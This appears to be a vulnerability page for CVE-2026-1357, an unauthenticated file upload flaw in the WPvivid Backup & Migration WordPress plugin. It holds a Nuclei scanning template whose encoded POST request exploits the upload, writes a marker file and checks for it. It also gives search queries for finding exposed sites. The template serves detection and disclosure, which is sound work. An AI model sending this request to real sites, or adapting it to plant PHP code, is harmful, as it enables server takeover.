CVE-2026-1357: WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload

2026-03-25 WPvivid Backup & Migration PoC Public

Description

WPvivid Backup & Migration plugin for WordPress <= 0.9.123 contains an unauthenticated arbitrary file upload vulnerability caused by improper error handling in RSA decryption and lack of path sanitization, letting unauthenticated attackers upload arbitrary PHP files and achieve remote code execution via wpvivid_action=send_to_site parameter.

PoC

id: CVE-2026-1357

info:
  name: WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload
  author: omarkurt
  severity: critical
  description: |
    WPvivid Backup & Migration plugin for WordPress <= 0.9.123 contains an unauthenticated arbitrary file upload vulnerability caused by improper error handling in RSA decryption and lack of path sanitization, letting unauthenticated attackers upload arbitrary PHP files and achieve remote code execution via wpvivid_action=send_to_site parameter.
  impact: |
    Unauthenticated attackers can upload arbitrary PHP files and execute remote code, leading to full server compromise.
  remediation: |
    Update to the latest version of WPvivid Backup & Migration plugin.
  reference:
    - https://vulnerabletarget.com/VT-2026-1357
    - https://github.com/LucasM0ntes/POC-CVE-2026-1357
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1357
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1357
    epss-score: 0.32714
    epss-percentile: 0.98257
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: wpvivid
    product: wpvivid-backuprestore
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content/plugins/wpvivid-backuprestore"
  tags: cve,cve2026,wordpress,wp,wp-plugin,wpvivid,file-upload,rce,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        wpvivid_action=send_to_site&wpvivid_content=MDAzQUJDMDAwMDAwMDAwMDAwMDExMDUGpYqxgOo0%2FZM3%2BLE%2B23CYS%2BI8Sbr6wwwU6dJweFxMk%2BOogH3GIpPZZMrm72oUS3vnrlf0AXv1vmGVBIbLo3QcQs%2B4JU7cLQw1kWByCFlYkpHcBuzxjEbVtT8VSdFgb6NLW6cpP4BdWT8bJx%2F%2FAOO09m3EFtf2sOcE%2BJjFJAew%2BELondwDkz3u5mssxGaQrlvWgaIlmPwz3FZx8dWC%2FHy7k4P3S5IJ7JV0tefjHJKCOzjPHngkZENu1uI2LmE6JaeF7XdXJCcmFOrNex4yJgIO0raawogHW457fM4wXKDnrM3bwxeLn5KwvAgadaTj4F9zWHxnjBmpa%2BtIaohISVcA5%2BGv6cAA95rzOoXBGUaI

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"success"'
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/vt-nuclei-test.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2026-1357-nuclei-verification-test"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202e7ce9181c53db1bc13c4f4199393e0f2e3eae29dc0b64a2c4a735085a7abbf5022100a9297a196277c3e401130ef9f82cfb97db095eb5b31044844e522d1af70d07bf:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities